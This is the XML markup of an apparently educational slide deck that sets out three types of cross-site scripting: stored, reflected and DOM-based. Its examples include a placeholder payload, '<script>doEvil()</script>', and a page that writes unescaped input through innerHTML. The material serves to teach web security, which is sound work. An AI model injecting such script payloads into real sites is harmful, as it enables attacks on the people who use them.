          <p:cNvPr id="6" name="object 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3759200" y="0"/>
            <a:ext cx="8432800" cy="492760"/>
            <a:chOff x="2819400" y="0"/>
            <a:chExt cx="6324600" cy="369570"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="object 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2819400" y="0"/>
              <a:ext cx="3429000" cy="36957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8" name="object 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6248400" y="0"/>
              <a:ext cx="2895600" cy="36957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5EC422"/>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5622713" y="23706"/>
            <a:ext cx="6462607" cy="386430"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="5636119" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-33" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Type</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>1	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-33" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Type</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-87" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 10"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8536940" y="499639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
            <a:ext cx="10248053" cy="6130803"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="541867" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="509681" algn="ctr">
              <a:spcBef>
                <a:spcPts val="4267"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="5867" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Three</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5867" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5867" spc="-60" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Types</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5867" spc="-33" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5867" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5867" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5867" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:endParaRPr sz="5867">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="474121" indent="-457189">
              <a:spcBef>
                <a:spcPts val="3007"/>
              </a:spcBef>
              <a:buFont typeface="Arial MT"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="473275" algn="l"/>
                <a:tab pos="474121" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="4267" spc="-53" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Type</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>2:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-33" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Persistent</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-40" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Stored</a:t>
            </a:r>
            <a:endParaRPr sz="4267">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1008355" lvl="1" indent="-382684">
              <a:spcBef>
                <a:spcPts val="920"/>
              </a:spcBef>
              <a:buFont typeface="Arial MT"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="1009201" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3733" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>The</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>attack</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>vector</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-33" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>stored</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="33" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>at</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-13" dirty="0">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latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Type</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-40" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>1:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> Reflected</a:t>
            </a:r>
            <a:endParaRPr sz="4267">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1008355" lvl="1" indent="-382684">
              <a:spcBef>
                <a:spcPts val="920"/>
              </a:spcBef>
              <a:buFont typeface="Arial MT"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="1009201" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3733" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>The</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>attack</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>value</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>‘reflected’</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>back</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>by</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>server</a:t>
            </a:r>
            <a:endParaRPr sz="3733">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="474121" indent="-457189">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buFont typeface="Arial MT"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="473275" algn="l"/>
                <a:tab pos="474121" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="4267" spc="-53" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Type</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>0:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Based</a:t>
            </a:r>
            <a:endParaRPr sz="4267">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1008355" lvl="1" indent="-382684">
              <a:spcBef>
                <a:spcPts val="920"/>
              </a:spcBef>
              <a:buFont typeface="Arial MT"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="1009201" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3733" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="60" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>in</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>client</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>side</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="33" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>code</a:t>
            </a:r>
            <a:endParaRPr sz="3733">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3"/>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4" name="object 4"/>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6" name="object 6"/>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8" name="object 8"/>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42C84-8ECA-FCA6-0140-1B4EA23A4B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9E97E62-885B-C1FC-601F-256A742B535C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="801279" y="593890"/>
            <a:ext cx="10367100" cy="6253785"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="541867" rIns="0" bIns="0"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PK" altLang="en-PK"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Stored XSS</a:t>
            </a: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 vector: Server-side database.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Example: Chat form storing &lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-PK" altLang="en-PK" sz="2800" b="0"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doEvil</a:t>
            </a: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()&lt;/script&gt;.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PK" altLang="en-PK"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Reflected XSS</a:t>
            </a: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 vector: User input reflected in the server's response.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Example: Search results embedding &lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-PK" altLang="en-PK" sz="2800" b="0"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doEvil</a:t>
            </a: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()&lt;/script&gt;.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PK" altLang="en-PK"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DOM-Based XSS</a:t>
            </a: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 vector: Client-side JavaScript processing untrusted input.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a:t>
            </a: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Welcome page using </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-PK" altLang="en-PK" sz="2800" b="0"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innerHTML</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-PK" altLang="en-PK" sz="2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inject unescaped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1008355" lvl="1" indent="-382684">
              <a:spcBef>
                <a:spcPts val="920"/>
              </a:spcBef>
              <a:buFont typeface="Arial MT"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="1009201" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr sz="3733" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2714CE43-8EF8-0C1A-0635-8B2ACF88DC27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="3759200" cy="492760"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2819400" h="369570">
                <a:moveTo>
                  <a:pt x="2819400" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="369341"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2819400" y="369341"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2819400" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="F2F2F2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7AD6564A-5BD4-DB1A-0679-868708F10307}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="104985"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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5FA9EEFD-9DF0-6E4B-2236-F6CD9CA376CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3759200" y="0"/>
            <a:ext cx="4572000" cy="492760"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3429000" h="369570">
                <a:moveTo>
                  <a:pt x="3429000" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="369341"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3429000" y="369341"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3429000" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="C0C0C0"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38BB5DF7-986C-5AF8-0DED-59C95C9F5103}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5622712"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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E121C03-5CC8-1197-ECF8-6F216D4274AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8331200" y="0"/>
            <a:ext cx="3860800" cy="492760"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2895600" h="369570">
                <a:moveTo>
                  <a:pt x="2895600" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="369341"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2895600" y="369341"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2895600" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="DADADA"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0C1A8A7-A86E-F2E5-57C1-D6CC6397A5F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11242377" y="23705"/>
            <a:ext cx="843280"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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{977728A7-0BDB-4129-CFA4-ABB622145D87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28385603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8" y="1"/>
            <a:ext cx="10240433" cy="6131656"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="542712" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="520687" algn="ctr">
              <a:spcBef>
                <a:spcPts val="4272"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="5867" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
